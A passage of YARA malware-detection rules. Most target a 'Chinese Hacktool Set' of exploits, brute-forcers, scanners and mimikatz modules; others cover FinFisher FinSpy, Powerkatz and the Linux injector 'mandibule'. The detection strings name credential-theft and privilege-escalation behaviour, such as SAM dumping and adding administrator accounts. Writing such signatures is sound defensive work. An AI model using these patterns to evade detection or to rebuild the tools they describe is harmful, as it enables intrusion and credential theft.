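        $s5 = "ftpcWaitingPassword" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 2000KB and 3 of them
}

rule Pc_rejoice {
    meta:
        description = "Chinese Hacktool Set - file rejoice.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372"
    strings:
        $s1 = "@members.3322.net/dyndns/update?system=dyndns&hostname=" fullword ascii
        $s2 = "http://www.xxx.com/xxx.exe" fullword ascii
        $s3 = "@ddns.oray.com/ph/update?hostname=" fullword ascii
        $s4 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
        $s5 = "ListViewProcessListColumnClick!" fullword ascii
        $s6 = "http://iframe.ip138.com/ic.asp" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 3000KB and 3 of them
}

rule ms11080_withcmd {
    meta:
        description = "Chinese Hacktool Set - file ms11080_withcmd.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "745e5058acff27b09cfd6169caf6e45097881a49"
    strings:
        $s1 = "Usage : ms11-080.exe cmd.exe Command " fullword ascii
        $s2 = "\\ms11080\\ms11080\\Debug\\ms11080.pdb" fullword ascii
        $s3 = "[>] by:Mer4en7y@90sec.org" fullword ascii
        $s4 = "[>] create porcess error" fullword ascii
        $s5 = "[>] ms11-080 Exploit" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 300KB and 1 of them
}

rule OtherTools_xiaoa {
    meta:
        description = "Chinese Hacktool Set - file xiaoa.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "6988acb738e78d582e3614f83993628cf92ae26d"
    strings:
        $s1 = "Usage:system_exp.exe \"cmd\"" fullword ascii
        $s2 = "The shell \"cmd\" success!" fullword ascii
        $s3 = "Not Windows NT family OS." fullword ascii /* PEStudio Blacklist: os */
        $s4 = "Unable to get kernel base address." fullword ascii
        $s5 = "run \"%s\" failed,code: %d" fullword ascii
        $s6 = "Windows Kernel Local Privilege Exploit " fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 100KB and 2 of them
}

rule unknown2 {
    meta:
        description = "Chinese Hacktool Set - file unknown2.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "32508d75c3d95e045ddc82cb829281a288bd5aa3"
    strings:
        $s1 = "http://md5.com.cn/index.php/md5reverse/index/md/" fullword wide
        $s2 = "http://www.md5decrypter.co.uk/feed/api.aspx?" fullword wide
        $s3 = "http://www.md5.com.cn" fullword wide
        $s4 = "1.5.exe" fullword wide
        $s5 = "\\Set.ini" fullword wide
        $s6 = "OpenFileDialog1" fullword wide
        $s7 = " (*.txt)|*.txt" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 300KB and 4 of them
}

rule hydra_7_3_hydra {
    meta:
        description = "Chinese Hacktool Set - file hydra.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "2f82b8bf1159e43427880d70bcd116dc9e8026ad"
    strings:
        $s1 = "[ATTEMPT-ERROR] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu" fullword ascii
        $s2 = "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=))(COMMAND=reload)(PASSWORD=%s)(SERVICE" ascii
        $s3 = "cn=^USER^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.com" fullword ascii
        $s4 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" fullword ascii
        $s5 = "hydra -P pass.txt target cisco-enable (direct console access)" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 700KB and 1 of them
}

rule OracleScan {
    meta:
        description = "Chinese Hacktool Set - file OracleScan.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "10ff7faf72fe6da8f05526367b3522a2408999ec"
    strings:
        $s1 = "MYBLOG:HTTP://HI.BAIDU.COM/0X24Q" fullword ascii
        $s2 = "\\Borland\\Delphi\\RTL" fullword ascii
        $s3 = "USER_NAME" ascii
        $s4 = "FROMWWHERE" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 300KB and all of them
}

rule SQLTools {
    meta:
        description = "Chinese Hacktool Set - file SQLTools.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "38a9caa2079afa2c8d7327e7762f7ed9a69056f7"
    strings:
        $s1 = "DBN_POST" fullword wide
        $s2 = "LOADER ERROR" fullword ascii
        $s3 = "www.1285.net" fullword wide
        $s4 = "TUPFILEFORM" fullword wide
        $s5 = "DBN_DELETE" fullword wide
        $s6 = "DBINSERT" fullword wide
        $s7 = "Copyright (C) Kibosoft Corp. 2001-2006" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 2350KB and all of them
}

rule portscanner {
    meta:
        description = "Chinese Hacktool Set - file portscanner.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "1de367d503fdaaeee30e8ad7c100dd1e320858a4"
    strings:
        $s0 = "PortListfNo" fullword ascii
        $s1 = ".533.net" fullword ascii
        $s2 = "CRTDLL.DLL" fullword ascii
        $s3 = "exitfc" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 25KB and all of them
}

rule kappfree {
    meta:
        description = "Chinese Hacktool Set - file kappfree.dll"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "e57e79f190f8a24ca911e6c7e008743480c08553"
    strings:
        $s1 = "Bienvenue dans un processus distant" fullword wide
        $s2 = "kappfree.dll" fullword ascii
        $s3 = "kappfree de mimikatz pour Windows (anti AppLocker)" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 200KB and all of them
}

rule Smartniff {
    meta:
        description = "Chinese Hacktool Set - file Smartniff.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "67609f21d54a57955d8fe6d48bc471f328748d0a"
    strings:
        $s1 = "smsniff.exe" fullword wide
        $s2 = "support@nirsoft.net0" fullword ascii
        $s3 = "</requestedPrivileges></security></trustInfo></assembly>" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 200KB and all of them
}

rule ChinaChopper_caidao {
    meta:
        description = "Chinese Hacktool Set - file caidao.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "056a60ec1f6a8959bfc43254d97527b003ae5edb"
    strings:
        $s1 = "Pass,Config,n{)" fullword ascii
        $s2 = "phMYSQLZ" fullword ascii
        $s3 = "\\DHLP\\." fullword ascii
        $s4 = "\\dhlp\\." fullword ascii
        $s5 = "SHAutoComple" fullword ascii
        $s6 = "MainFrame" ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 1077KB and all of them
}

rule KiwiTaskmgr_2 {
    meta:
        description = "Chinese Hacktool Set - file KiwiTaskmgr.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
    strings:
        $s1 = "Process Ok, Memory Ok, resuming process :)" fullword wide
        $s2 = "Kiwi Taskmgr no-gpo" fullword wide
        $s3 = "KiwiAndTaskMgr" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 300KB and all of them
}

rule kappfree_2 {
    meta:
        description = "Chinese Hacktool Set - file kappfree.dll"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "5d578df9a71670aa832d1cd63379e6162564fb6b"
    strings:
        $s1 = "kappfree.dll" fullword ascii
        $s2 = "kappfree de mimikatz pour Windows (anti AppLocker)" fullword wide
        $s3 = "' introuvable !" fullword wide
        $s4 = "kiwi\\mimikatz" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 200KB and 2 of them
}

rule x_way2_5_sqlcmd {
    meta:
        description = "Chinese Hacktool Set - file sqlcmd.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "5152a57e3638418b0d97a42db1c0fc2f893a2794"
    strings:
        /* Almost all strings here are loader/import names; the 20KB..23KB size
           window in the condition is what makes the combination specific. */
        $s1 = "LOADER ERROR" fullword ascii
        $s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
        $s3 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
        $s4 = "kernel32.dll" fullword ascii
        $s5 = "VirtualAlloc" fullword ascii
        $s6 = "VirtualFree" fullword ascii
        $s7 = "VirtualProtect" fullword ascii
        $s8 = "ExitProcess" fullword ascii
        $s9 = "user32.dll" fullword ascii
        $s16 = "MessageBoxA" fullword ascii
        $s10 = "wsprintfA" fullword ascii
        $s11 = "kernel32.dll" fullword ascii /* same content as $s4; redundant under "all of them" */
        $s12 = "GetProcAddress" fullword ascii
        $s13 = "GetModuleHandleA" fullword ascii
        $s14 = "LoadLibraryA" fullword ascii
        $s15 = "odbc32.dll" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 23KB and filesize > 20KB and all of them
}

rule Win32_klock {
    meta:
        description = "Chinese Hacktool Set - file klock.dll"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "7addce4434670927c4efaa560524680ba2871d17"
    strings:
        $s1 = "klock.dll" fullword ascii
        $s2 = "Erreur : impossible de basculer le bureau ; SwitchDesktop : " fullword wide
        $s3 = "klock de mimikatz pour Windows" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 250KB and all of them
}

rule ipsearcher {
    meta:
        description = "Chinese Hacktool Set - file ipsearcher.dll"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "1e96e9c5c56fcbea94d26ce0b3f1548b224a4791"
    strings:
        $s0 = "http://www.wzpg.com" fullword ascii
        $s1 = "ipsearcher\\ipsearcher\\Release\\ipsearcher.pdb" fullword ascii
        $s3 = "_GetAddress" fullword ascii
        $s5 = "ipsearcher.dll" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 140KB and all of them
}

rule ms10048_x64 {
    meta:
        description = "Chinese Hacktool Set - file ms10048-x64.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "418bec3493c85e3490e400ecaff5a7760c17a0d0"
    strings:
        $s1 = "The target is most likely patched." fullword ascii
        $s2 = "Dojibiron by Ronald Huizer, (c) master#h4cker.us " fullword ascii
        $s3 = "[ ] Creating evil window" fullword ascii
        $s4 = "[+] Set to %d exploit half succeeded" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 40KB and 1 of them
}

rule hscangui {
    meta:
        description = "Chinese Hacktool Set - file hscangui.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "af8aced0a78e1181f4c307c78402481a589f8d07"
    strings:
        $s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\" !!!" fullword ascii
        $s2 = "http://www.cnhonker.com" fullword ascii
        $s3 = "%s@ftpscan#Cracked account: %s/%s" fullword ascii
        $s4 = "[%s]: Found \"FTP account: %s/%s\" !!!" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 220KB and 2 of them
}

rule GoodToolset_ms11080 {
    meta:
        description = "Chinese Hacktool Set - file ms11080.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "f0854c49eddf807f3a7381d3b20f9af4a3024e9f"
    strings:
        $s1 = "[*] command add user 90sec 90sec" fullword ascii
        $s2 = "\\ms11080\\Debug\\ms11080.pdb" fullword ascii
        $s3 = "[>] by:Mer4en7y@90sec.org" fullword ascii
        $s4 = "[*] Add to Administrators success" fullword ascii
        $s5 = "[*] User has been successfully added" fullword ascii
        $s6 = "[>] ms11-08 Exploit" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 240KB and 2 of them
}

rule epathobj_exp64 {
    meta:
        description = "Chinese Hacktool Set - file epathobj_exp64.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "09195ba4e25ccce35c188657957c0f2c6a61d083"
    strings:
        $s1 = "Watchdog thread %d waiting on Mutex" fullword ascii
        $s2 = "Exploit ok run command" fullword ascii
        $s3 = "\\epathobj_exp\\x64\\Release\\epathobj_exp.pdb" fullword ascii
        $s4 = "Alllocated userspace PATHRECORD () %p" fullword ascii
        $s5 = "Mutex object did not timeout, list not patched" fullword ascii
        /* $s6 is a common CRT string (see count below); with "2 of them" a hit
           still needs at least one of the specific strings $s1..$s5. */
        $s6 = "- inconsistent onexit begin-end variables" fullword wide /* Goodware String - occured 96 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 150KB and 2 of them
}

rule kelloworld_2 {
    meta:
        description = "Chinese Hacktool Set - file kelloworld.dll"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
    strings:
        $s1 = "Hello World!"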
fullword wide $s2 = "kelloworld.dll" fullword ascii $s3 = "kelloworld de mimikatz pour Windows" fullword wide condition: uint16(0) == 0x5a4d and filesize < 200KB and all of them } rule HScan_v1_20_hscan { meta: description = "Chinese Hacktool Set - file hscan.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "568b06696ea0270ee1a744a5ac16418c8dacde1c" strings: $s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\" !!!" fullword ascii $s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,100" fullword ascii $s3 = ".\\report\\%s-%s.html" fullword ascii $s4 = ".\\log\\Hscan.log" fullword ascii $s5 = "[%s]: Found cisco Enable password: %s !!!" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 200KB and 2 of them } rule _Project1_Generate_rejoice { meta: description = "Chinese Hacktool Set - from files Project1.exe, Generate.exe, rejoice.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" super_rule = 1 hash0 = "d1a5e3b646a16a7fcccf03759bd0f96480111c96" hash1 = "2cb4c3916271868c30c7b4598da697f59e9c7a12" hash2 = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372" strings: $s1 = "sfUserAppDataRoaming" fullword ascii $s2 = "$TRzFrameControllerPropertyConnection" fullword ascii $s3 = "delphi32.exe" fullword ascii $s4 = "hkeyCurrentUser" fullword ascii $s5 = "%s is not a valid IP address." 
fullword wide $s6 = "Citadel hooking error" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 2000KB and all of them } rule _hscan_hscan_hscangui { meta: description = "Chinese Hacktool Set - from files hscan.exe, hscan.exe, hscangui.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" super_rule = 1 hash0 = "17a743e40790985ececf5c66eaad2a1f8c4cffe8" hash1 = "568b06696ea0270ee1a744a5ac16418c8dacde1c" hash2 = "af8aced0a78e1181f4c307c78402481a589f8d07" strings: $s1 = ".\\log\\Hscan.log" fullword ascii $s2 = ".\\report\\%s-%s.html" fullword ascii $s3 = "[%s]: checking \"FTP account: ftp/ftp@ftp.net\" ..." fullword ascii $s4 = "[%s]: IPC NULL session connection success !!!" fullword ascii $s5 = "Scan %d targets,use %4.1f minutes" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 240KB and all of them } rule kiwi_tools { meta: description = "Chinese Hacktool Set - from files kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, mimikatz.sys, sekurlsa.dll, kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, mimikatz.sys, sekurlsa.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" super_rule = 1 hash0 = "e57e79f190f8a24ca911e6c7e008743480c08553" hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f" hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8" hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6" hash4 = "5c90d648c414bdafb549291f95fe6f27c0c9b5ec" hash5 = "7addce4434670927c4efaa560524680ba2871d17" hash6 = "28c5c0bdb7786dc2771672a2c275be7d9b742ec7" hash7 = "b5c93489a1b62181594d0fb08cc510d947353bc8" hash8 = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5" hash9 = "5d578df9a71670aa832d1cd63379e6162564fb6b" hash10 = "febadc01a64a071816eac61a85418711debaf233" hash11 = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86" hash12 = "56a61c808b311e2225849d195bbeb69733efe49a" hash13 = 
"8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16" hash14 = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc" hash15 = "f661d6516d081c37ab7da0f4ec21b2cc6a9257c6" hash16 = "20facf1fa2d87cccf177403ca1a7852128a9a0ab" hash17 = "6e0ffa472d63fdda5abc4c1b164ba8724dcb25b5" strings: $s1 = "http://blog.gentilkiwi.com/mimikatz" ascii $s2 = "Benjamin Delpy" fullword ascii $s3 = "GlobalSign" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1000KB and all of them } rule kiwi_tools_gentil_kiwi { meta: description = "Chinese Hacktool Set - from files kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, sekurlsa.dll, kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, sekurlsa.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" super_rule = 1 hash0 = "e57e79f190f8a24ca911e6c7e008743480c08553" hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f" hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8" hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6" hash4 = "5c90d648c414bdafb549291f95fe6f27c0c9b5ec" hash5 = "7addce4434670927c4efaa560524680ba2871d17" hash6 = "28c5c0bdb7786dc2771672a2c275be7d9b742ec7" hash7 = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5" hash8 = "5d578df9a71670aa832d1cd63379e6162564fb6b" hash9 = "febadc01a64a071816eac61a85418711debaf233" hash10 = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86" hash11 = "56a61c808b311e2225849d195bbeb69733efe49a" hash12 = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16" hash13 = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc" hash14 = "f661d6516d081c37ab7da0f4ec21b2cc6a9257c6" hash15 = "6e0ffa472d63fdda5abc4c1b164ba8724dcb25b5" strings: $s1 = "mimikatz" fullword wide $s2 = "Copyright (C) 2012 Gentil Kiwi" fullword wide $s3 = "Gentil Kiwi" fullword wide condition: uint16(0) == 0x5a4d and filesize < 1000KB and all of them } rule dubrute : bruteforcer toolkit { meta: author = "Christian Rebischke (@sh1bumi)" date = "2015-09-05" 
description = "Rules for DuBrute Bruteforcer" in_the_wild = true family = "Hackingtool/Bruteforcer" strings: $a = "WBrute" $b = "error.txt" $c = "good.txt" $d = "source.txt" $e = "bad.txt" $f = "Generator IP@Login;Password" condition: //check for MZ Signature at offset 0 uint16(0) == 0x5A4D and //check for dubrute specific strings $a and $b and $c and $d and $e and $f } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule FinSpy_2 { meta: description = "FinFisher FinSpy" author = "botherder https://github.com/botherder" strings: $password1 = /\/scomma kbd101\.sys/ wide ascii $password2 = /(N)AME,EMAIL CLIENT,EMAIL ADDRESS,SERVER NAME,SERVER TYPE,USERNAME,PASSWORD,PROFILE/ wide ascii $password3 = /\/scomma excel2010\.part/ wide ascii $password4 = /(A)PPLICATION,PROTOCOL,USERNAME,PASSWORD/ wide ascii $password5 = /\/stab MSVCR32\.manifest/ wide ascii $password6 = /\/scomma MSN2010\.dll/ wide ascii $password7 = /\/scomma Firefox\.base/ wide ascii $password8 = /(I)NDEX,URL,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD,FILE,HTTP/ wide ascii $password9 = /\/scomma IE7setup\.sys/ wide ascii $password10 = /(O)RIGIN URL,ACTION URL,USERNAME FIELD,PASSWORD FIELD,USERNAME,PASSWORD,TIMESTAMP/ wide ascii $password11 = /\/scomma office2007\.cab/ wide ascii $password12 = /(U)RL,PASSWORD TYPE,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD/ wide ascii $password13 = /\/scomma outlook2007\.dll/ wide ascii $password14 = /(F)ILENAME,ENCRYPTION,VERSION,CRC,PASSWORD 1,PASSWORD 2,PASSWORD 3,PATH,SIZE,LAST MODIFICATION DATE,ERROR/ wide ascii $screenrec1 = /(s)111o00000000\.dat/ wide ascii $screenrec2 = /(t)111o00000000\.dat/ wide ascii $screenrec3 = /(f)113o00000000\.dat/ wide ascii $screenrec4 = /(w)114o00000000\.dat/ wide ascii $screenrec5 = /(u)112Q00000000\.dat/ wide ascii $screenrec6 = /(v)112Q00000000\.dat/ wide ascii $screenrec7 = 
/(v)112O00000000\.dat/ wide ascii //$keylogger1 = /\<%s UTC %s\|%d\|%s\>/ wide ascii //$keylogger2 = /1201[0-9A-F]{8}\.dat/ wide ascii $micrec = /2101[0-9A-F]{8}\.dat/ wide ascii $skyperec1 = /\[%19s\] %25s\: %s/ wide ascii $skyperec2 = /Global\\\{A48F1A32\-A340\-11D0\-BC6B\-00A0C903%\.04X\}/ wide $skyperec3 = /(1411|1421|1431|1451)[0-9A-F]{8}\.dat/ wide ascii $mouserec1 = /(m)sc183Q000\.dat/ wide ascii $mouserec2 = /2201[0-9A-F]{8}\.dat/ wide ascii $driver = /\\\\\\\\\.\\\\driverw/ wide ascii $janedow1 = /(J)ane Dow\'s x32 machine/ wide ascii $janedow2 = /(J)ane Dow\'s x64 machine/ wide ascii $versions1 = /(f)inspyv2/ nocase $versions2 = /(f)inspyv4/ nocase $bootkit1 = /(b)ootkit_x32driver/ $bootkit2 = /(b)ootkit_x64driver/ $typo1 = /(S)creenShort Recording/ wide $mssounddx = /(S)ystem\\CurrentControlSet\\Services\\mssounddx/ wide condition: 8 of ($password*) or any of ($screenrec*) or $micrec or any of ($skyperec*) or any of ($mouserec*) or $driver or any of ($janedow*) or any of ($versions*) or any of ($bootkit*) or $typo1 or $mssounddx } rule FinSpy { meta: description = "FinFisher FinSpy" author = "AlienVault Labs" strings: $filter1 = "$password14" $filter2 = "$screenrec7" $filter3 = "$micrec" $filter4 = "$skyperec3" $filter5 = "$mouserec2" $filter6 = "$driver" $filter7 = "$janedow2" $filter8 = "$bootkit2" $password1 = /\/scomma kbd101\.sys/ wide ascii $password2 = /(N)AME,EMAIL CLIENT,EMAIL ADDRESS,SERVER NAME,SERVER TYPE,USERNAME,PASSWORD,PROFILE/ wide ascii $password3 = /\/scomma excel2010\.part/ wide ascii $password4 = /(A)PPLICATION,PROTOCOL,USERNAME,PASSWORD/ wide ascii $password5 = /\/stab MSVCR32\.manifest/ wide ascii $password6 = /\/scomma MSN2010\.dll/ wide ascii $password7 = /\/scomma Firefox\.base/ wide ascii $password8 = /(I)NDEX,URL,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD,FILE,HTTP/ wide ascii $password9 = /\/scomma IE7setup\.sys/ wide ascii $password10 = /(O)RIGIN URL,ACTION URL,USERNAME FIELD,PASSWORD FIELD,USERNAME,PASSWORD,TIMESTAMP/ 
wide ascii $password11 = /\/scomma office2007\.cab/ wide ascii $password12 = /(U)RL,PASSWORD TYPE,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD/ wide ascii $password13 = /\/scomma outlook2007\.dll/ wide ascii $password14 = /(F)ILENAME,ENCRYPTION,VERSION,CRC,PASSWORD 1,PASSWORD 2,PASSWORD 3,PATH,SIZE,LAST MODIFICATION DATE,ERROR/ wide ascii $screenrec1 = /(s)111o00000000\.dat/ wide ascii $screenrec2 = /(t)111o00000000\.dat/ wide ascii $screenrec3 = /(f)113o00000000\.dat/ wide ascii $screenrec4 = /(w)114o00000000\.dat/ wide ascii $screenrec5 = /(u)112Q00000000\.dat/ wide ascii $screenrec6 = /(v)112Q00000000\.dat/ wide ascii $screenrec7 = /(v)112O00000000\.dat/ wide ascii //$keylogger1 = /\<%s UTC %s\|%d\|%s\>/ wide ascii //$keylogger2 = /1201[0-9A-F]{8}\.dat/ wide ascii $micrec = /2101[0-9A-F]{8}\.dat/ wide ascii $skyperec1 = /\[%19s\] %25s\: %s/ wide ascii $skyperec2 = /Global\\\{A48F1A32\-A340\-11D0\-BC6B\-00A0C903%\.04X\}/ wide //$skyperec3 = /(1411|1421|1431|1451)[0-9A-F]{8}\.dat/ wide ascii //$mouserec1 = /(m)sc183Q000\.dat/ wide ascii //$mouserec2 = /2201[0-9A-F]{8}\.dat/ wide ascii $driver = /\\\\\\\\\.\\\\driverw/ wide ascii $janedow1 = /(J)ane Dow\'s x32 machine/ wide ascii $janedow2 = /(J)ane Dow\'s x64 machine/ wide ascii //$versions1 = /(f)inspyv2/ nocase //$versions2 = /(f)inspyv4/ nocase $bootkit1 = /(b)ootkit_x32driver/ $bootkit2 = /(b)ootkit_x64driver/ $typo1 = /(S)creenShort Recording/ wide $mssounddx = /(S)ystem\\CurrentControlSet\\Services\\mssounddx/ wide condition: (8 of ($password*) or any of ($screenrec*) or $micrec or any of ($skyperec*) or $driver or any of ($janedow*) or any of ($bootkit*) or $typo1 or $mssounddx) and not any of ($filter*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
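*/
/*
   Yara Rule Set
   Author: Florian Roth
   Date: 2016-02-05
   Identifier: Powerkatz
*/

rule Powerkatz_DLL_Generic {
   meta:
      description = "Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible)"
      author = "Florian Roth"
      reference = "PowerKatz Analysis"
      date = "2016-02-05"
      super_rule = 1
      score = 80
      hash1 = "c20f30326fcebad25446cf2e267c341ac34664efad5c50ff07f0738ae2390eae"
      hash2 = "1e67476281c1ec1cf40e17d7fc28a3ab3250b474ef41cb10a72130990f0be6a0"
      hash3 = "49e7bac7e0db87bf3f0185e9cf51f2539dbc11384fefced465230c4e5bce0872"
   strings:
      /* Output / format strings (UTF-16) */
      $s1 = "%3u - Directory '%s' (*.kirbi)" fullword wide
      $s2 = "%*s pPublicKey : " fullword wide
      $s3 = "ad_hoc_network_formed" fullword wide
      $s4 = "<3 eo.oe ~ ANSSI E>" fullword wide
      $s5 = "\\*.kirbi" fullword wide
      /* Error strings carrying kuhl_m_lsadump_* / kull_m_registry_* function-name tokens */
      $c1 = "kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x%08x)" fullword wide
      $c2 = "kuhl_m_lsadump_getComputerAndSyskey ; kuhl_m_lsadump_getSyskey KO" fullword wide
   condition:
      /* A PE (MZ header) under 1000KB matches on a single string;
         any other input needs two of the seven. */
      ( uint16(0) == 0x5a4d and filesize < 1000KB and 1 of them ) or 2 of them
}

/*
   Yara rule to detect ELF Linux process injector toolkit "mandibule" generic.
   name: TOOLKIT_Mandibule.yar
   analyzed by unixfreaxjp.
   result:
      TOOLKIT_Mandibule ./mandibule//mandibule-dynx86-stripped
      TOOLKIT_Mandibule ./mandibule//mandibule-dynx86-UNstripped
      TOOLKIT_Mandibule ./mandibule//mandibule-dun64-UNstripped
      TOOLKIT_Mandibule ./mandibule//mandibule-dyn64-stripped

   This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
   and open to any user or organization, as long as you use it under this license.
*/

/* Sub-rule: format-string style log messages of the injector. Private, so it only
   contributes to TOOLKIT_Mandibule below and never reports on its own. */
private rule is__str_mandibule_gen1 {
   meta:
      author = "unixfreaxjp"
      date = "2018-05-31"
   strings:
      $str01 = "shared arguments too big" fullword nocase wide ascii
      $str02 = "self inject pid: %" fullword nocase wide ascii
      $str03 = "injected shellcode at 0x%lx" fullword nocase wide ascii
      $str04 = "target pid: %d" fullword nocase wide ascii
      $str05 = "mapping '%s' into memory at 0x%lx" fullword nocase wide ascii
      $str06 = "shellcode injection addr: 0x%lx" fullword nocase wide ascii
      $str07 = "loading elf at: 0x%llx" fullword nocase wide ascii
   condition:
      4 of them
}

/* Sub-rule: x86-64 code patterns (author's tags st/mn/pt/ld kept as given). */
private rule is__hex_top_mandibule64 {
   meta:
      author = "unixfreaxjp"
      date = "2018-05-31"
   strings:
      $hex01 = { 48 8D 05 43 01 00 00 48 89 E7 FF D0 } // st
      $hex02 = { 53 48 83 EC 50 48 89 7C 24 08 48 8B 44 24 08 } // mn
      $hex03 = { 48 81 EC 18 02 00 00 89 7C 24 1C 48 89 74 } // pt
      $hex04 = { 53 48 81 EC 70 01 01 00 48 89 7C 24 08 48 8D 44 24 20 48 05 00 00 } // ld
   condition:
      3 of them
}

/* Sub-rule: 32-bit x86 code patterns (same tags as the 64-bit set). */
private rule is__hex_mid_mandibule32 {
   meta:
      author = "unixfreaxjp"
      date = "2018-06-01"
   strings:
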